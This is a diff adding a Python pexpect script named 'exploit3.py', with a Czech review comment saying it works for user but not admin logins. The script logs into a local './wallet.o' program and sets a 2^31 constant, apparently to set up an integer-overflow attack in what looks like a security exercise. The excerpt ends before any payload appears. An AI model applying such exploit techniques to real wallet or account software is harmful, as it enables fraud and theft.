exploit3.py

```diff
@@ -0,0 +1,43 @@
+#!/usr/bin/python3
+import sys, re, pexpect
+
+usr = input("enter username to login with: ")
+pwd = input("enter password to login with: ")
+intMax = 2147483648
+terminal = pexpect.spawn("/bin/bash", encoding='utf-8')
+terminal.logfile = sys.stdout
+terminal.sendline("./wallet.o")
+terminal.expect("Login as:")
+terminal.sendline(usr)
+terminal.expect("Password:")
+terminal.sendline(pwd)
+terminal.expect("Choose")
+terminal.sendline("1")
```

Comment:
Funguje jenom pro usera, ne admina. Když zadáš uživatelské údaje admina, script se zasekne. Asi to není big deal, ale musíme na to myslet.